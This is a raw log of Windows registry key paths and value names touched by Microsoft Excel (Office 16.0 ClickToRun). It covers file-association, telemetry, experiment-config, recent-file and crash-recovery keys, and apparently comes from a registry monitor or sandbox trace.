HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe\shell
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher\shell
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe\shell
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command
NULL
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}
4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}
Categories
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSTagIds0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSCategoriesSeverities
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
`,
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\2BC61
2BC61
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel
ExcelWorkbookOpenedCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Security\FileBlock
FileTypeBlockList
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Security\FileBlock
OoxmlConverterBlockList
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\2BE84
2BE84
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.28
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel
ETag
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel
ConfigIds
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\FileIO
FileActivityStoreVersion
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\File MRU
Item 21
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Place MRU
Item 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
0018400E0CEA4CED
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Volatile
MsaDevice
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}
4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}
Categories
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSTagIds0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSCategoriesSeverities
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}
4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}
Categories
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}
4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}
Categories
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSTagIds0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSTagIds1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSTagIds2
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSCategoriesSeverities
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSAllCategories
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-CH
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-GB
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-CH
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-GB
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel
ImmersiveWorkbookDirtySentinel
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel
ExcelPreviousSessionId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common
SessionId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\7500
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\7500
0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\16
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell\Edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell\Edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell\Print
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell\Print
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Default Editor\shell\Print\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\HTML\Old Default Editor\shell\Print\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Print
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Print
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Print
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Print
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Print\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Print\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\shell\Print\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\htmlfile\ShellEx\IconHandler
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile\DefaultIcon
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Default Editor\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Old Default Editor\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Old Default Editor\shell\Edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Default Editor\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Shared\MHTML\Old Default Editor\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\shell\Print\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\mhtmlfile\ShellEx\IconHandler
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile\DefaultIcon
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe\shell\edit
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command
NULL
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=8192&uilcid=1033&build=16.0.16827&crev=3\0
FilePath
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=8192&uilcid=1033&build=16.0.16827&crev=3\0
StartDate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=8192&uilcid=1033&build=16.0.16827&crev=3\0
EndDate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs
LicenseCategoryInfo
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs
LicenseSKUInfo
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache
LastClean
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\7500
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\2BC61
2BC61
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel
Expires
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.2
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.3
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.5
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.6
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.7
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.9
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
0.10
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
